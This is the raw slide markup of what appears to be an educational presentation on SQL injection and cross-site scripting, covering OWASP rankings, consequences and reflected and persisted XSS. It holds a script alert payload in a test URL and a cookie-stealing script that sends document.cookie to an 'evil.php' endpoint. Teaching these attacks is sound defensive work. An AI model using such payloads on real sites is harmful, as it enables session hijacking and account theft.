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newspaper.com/items.php?id=2"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6"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2797751-018C-436C-BDF7-C158CE071B94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617233" y="4539573"/>
            <a:ext cx="8957534" cy="1182838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E86EFA-E03C-4901-A918-626A1B73F172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1911275" y="5722411"/>
            <a:ext cx="8369450" cy="480330"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using your poor coding to (Ab)use your valuable Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="131"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ploits of a Mom">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71C016C5-E092-401B-9BA0-6532D8EBF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769" y="951493"/>
            <a:ext cx="9676400" cy="297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2294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A1E0-062F-DC4A-9876-6060C77B8EBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>CROSS SITE SCRIPTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B14102B-54C8-3D48-AF09-E22494FE9736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3869827" y="2514600"/>
            <a:ext cx="4449170" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>For when you don’t want to be in charge anymore.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2420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5D3D-AE7B-194E-986D-3435A4333C26}"/>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00A2F634-F9D9-6547-B78B-2D1943522FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDF0717-56E4-0F48-9ACA-DE5D0AF212E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Previous Ranking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Current Ranking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97D6A772-DE0D-D94F-A164-56C223A8AF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43FE3E28-8851-894E-9346-6360BC904B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Style of Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29910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8D0E-BA68-7746-953C-B4D16C555F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consequences</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14229AED-F86A-0240-8DBC-ABE8B5B8A4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C846479F-EC93-384B-8B59-5964F9E6719C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Alert Boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Procrastination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Actual Threat Level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23E72B90-5BAC-CC47-9ED0-6B7FAA48A69E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Web application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455CD7C6-A25B-9C4E-A356-BDA7A1157BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Developers lose control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Different Display</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Redirection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{385E16C7-8917-044D-BBC4-B4223F6C7944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7F288D5-9819-2245-991F-2A09E2B42EA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Upgraded Privileges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12957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A89-9006-1846-874B-68BA9327C898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="609600"/>
            <a:ext cx="4048104" cy="1444831"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{301A2C01-13F9-4547-8FF3-E99944A1F100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152740" y="1959512"/>
            <a:ext cx="3208735" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Reflected XSS, typically set up in a Query string in URL, the web application takes a value out of the URL/Query string and returns it back down to the browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2580EA-3E52-9244-8093-018FF5676794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="3429000"/>
            <a:ext cx="3194968" cy="1988128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>TARGET, RIGHT NOW!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>LETS GO PHISHING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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85EAF102-D40E-E74E-BE56-36BE58C5EAE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6287074" y="1405514"/>
            <a:ext cx="4283527" cy="110799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pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>testsite.test</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/&lt;script&gt;alert("TEST");&lt;/script&gt;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1EA11430-D64D-F34E-95CE-649CDE1C343A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094412" y="2811978"/>
            <a:ext cx="5122223" cy="3156940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20568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253A-7385-964E-B198-B8F6069DFD2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persisted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7BC33F-D039-7C42-B887-25A4AB693F16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218832" y="1935762"/>
            <a:ext cx="3208735" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Summed up in four words it is store it for later. This isn’t the attacker storing it for later though , but a web server or the backend storing mechanism.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2541C27E-89CF-3147-8229-5B798A0B42F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205263" y="3680898"/>
            <a:ext cx="3184385" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>COOKIES!!!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE8D45C7-3DB5-6242-92B6-4ED30AB6D40E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1167345" y="4343401"/>
            <a:ext cx="3260222" cy="1576700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;SCRIPT type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = '../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.php?cakemonster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=' + escape(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE79A2B-6BBC-6746-970E-943037F5B2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441136" y="1935762"/>
            <a:ext cx="3194968" cy="2430936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
